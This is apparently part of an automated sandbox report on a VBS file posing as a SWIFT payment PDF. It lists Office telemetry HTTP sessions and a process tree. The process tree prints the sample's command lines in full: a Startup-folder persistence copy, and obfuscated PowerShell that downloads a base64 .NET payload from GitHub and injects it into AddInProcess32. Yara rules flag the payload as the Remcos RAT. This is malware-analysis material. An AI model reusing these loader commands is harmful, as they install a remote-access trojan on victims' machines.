                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                ETag: "0x8DC582BE32FE1A2"
                                                                                x-ms-request-id: 1cc313a1-e01e-0071-4b8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55ncqdn59ub6rndq00000000bx000000000a94e
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:17 UTC | 1369 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                141 | 192.168.2.5 | 55608 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:17 UTC | 192 | OUT | GET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1414
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BE03B051D"
                                                                                x-ms-request-id: 4b0a4edd-c01e-00ad-438c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55rg5b7sh1vuv8t7n0000000crg000000002fg6
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1414 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                142 | 192.168.2.5 | 55610 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:17 UTC | 192 | OUT | GET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1362
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE54CA33F"
                                                                                x-ms-request-id: f1c85a61-d01e-007a-188c-15f38c000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55kg97hfq5uqyxxaw0000000ca0000000006bzk
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1362 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                143 | 192.168.2.5 | 55609 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:17 UTC | 192 | OUT | GET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1377
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                ETag: "0x8DC582BEAFF0125"
                                                                                x-ms-request-id: 0dcb9a48-e01e-0003-1c8c-150fa8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55ncqdn59ub6rndq00000000bx000000000a94w
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1377 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                144 | 192.168.2.5 | 55611 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:18 UTC | 192 | OUT | GET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1399
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                ETag: "0x8DC582BE0A2434F"
                                                                                x-ms-request-id: 4a218e36-401e-00a3-268c-158b09000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55gs96cphvgp5f5vc0000000ca0000000002bxe
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1399 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                145 | 192.168.2.5 | 55613 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:18 UTC | 192 | OUT | GET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1409
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BDFC438CF"
                                                                                x-ms-request-id: eccf31ce-001e-0079-3e8c-1512e8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55rv8zjq9dg0musxg0000000ce0000000001aq9
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1409 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                146 | 192.168.2.5 | 55618 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:18 UTC | 192 | OUT | GET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1408
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE1038EF2"
                                                                                x-ms-request-id: f40770c2-201e-0000-318c-15a537000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55w69c2zvnrz0gmgw0000000ck00000000066t1
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                147 | 192.168.2.5 | 55620 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:18 UTC | 192 | OUT | GET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1371
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                ETag: "0x8DC582BED3D048D"
                                                                                x-ms-request-id: 4f10e0ef-e01e-0085-118c-15c311000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc554l9xf959gp9cb1s00000006dg000000008ye5
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1371 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                148 | 192.168.2.5 | 55619 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:18 UTC | 192 | OUT | GET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1372
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                ETag: "0x8DC582BE6669CA7"
                                                                                x-ms-request-id: b9a1a970-401e-0078-528c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55tsfp92w7yna557w0000000ceg000000000uy7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC | 1372 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                149 | 192.168.2.5 | 55622 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:18 UTC | 192 | OUT | GET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:19 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1389
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE0F427E7"
                                                                                x-ms-request-id: b9d89a70-001e-008d-3b8c-15d91e000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc554l9xf959gp9cb1s00000006e0000000008ku2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:19 UTC | 1389 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                Target ID:0
                                                                                Start time:05:33:32
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
                                                                                Imagebase:0x7ff7e1bf0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:05:33:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
                                                                                Imagebase:0x7ff7d4d80000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:05:33:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:05:33:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:ping 127.0.0.1 -n 10
                                                                                Imagebase:0x7ff754b20000
                                                                                File size:22'528 bytes
                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:05:33:42
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:05:33:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:05:33:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:8
                                                                                Start time:05:33:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:05:33:52
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                Imagebase:0xfc0000
                                                                                File size:43'008 bytes
                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:11
                                                                                Start time:05:33:52
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:05:33:52
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:05:33:55
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
